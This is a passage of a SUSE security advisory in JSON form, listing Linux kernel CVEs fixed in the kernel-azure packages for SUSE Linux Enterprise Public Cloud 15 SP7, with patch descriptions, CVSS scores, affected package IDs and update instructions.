"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: sof_sdw: Prevent jump to NULL add_sidecar callback\n\nIn create_sdw_dailink() check that sof_end-\u003ecodec_info-\u003eadd_sidecar\nis not NULL before calling it.\n\nThe original code assumed that if include_sidecar is true, the codec\non that link has an add_sidecar callback. But there could be other\ncodecs on the same link that do not have an add_sidecar callback.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40132",
"url": "https://www.suse.com/security/cve/CVE-2025-40132"
},
{
"category": "external",
"summary": "SUSE Bug 1253330 for CVE-2025-40132",
"url": "https://bugzilla.suse.com/1253330"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40132"
},
{
"cve": "CVE-2025-40136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: hisilicon/qm - request reserved interrupt for virtual function\n\nThe device interrupt vector 3 is an error interrupt for\nphysical function and a reserved interrupt for virtual function.\nHowever, the driver has not registered the reserved interrupt for\nvirtual function. When allocating interrupts, the number of interrupts\nis allocated based on powers of two, which includes this interrupt.\nWhen the system enables GICv4 and the virtual function passthrough\nto the virtual machine, releasing the interrupt in the driver\ntriggers a warning.\n\nThe WARNING report is:\nWARNING: CPU: 62 PID: 14889 at arch/arm64/kvm/vgic/vgic-its.c:852 its_free_ite+0x94/0xb4\n\nTherefore, register a reserved interrupt for VF and set the\nIRQF_NO_AUTOEN flag to avoid that warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40136",
"url": "https://www.suse.com/security/cve/CVE-2025-40136"
},
{
"category": "external",
"summary": "SUSE Bug 1253340 for CVE-2025-40136",
"url": "https://bugzilla.suse.com/1253340"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40136"
},
{
"cve": "CVE-2025-40142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40142"
}
],
"notes": [
{
"category": "general",
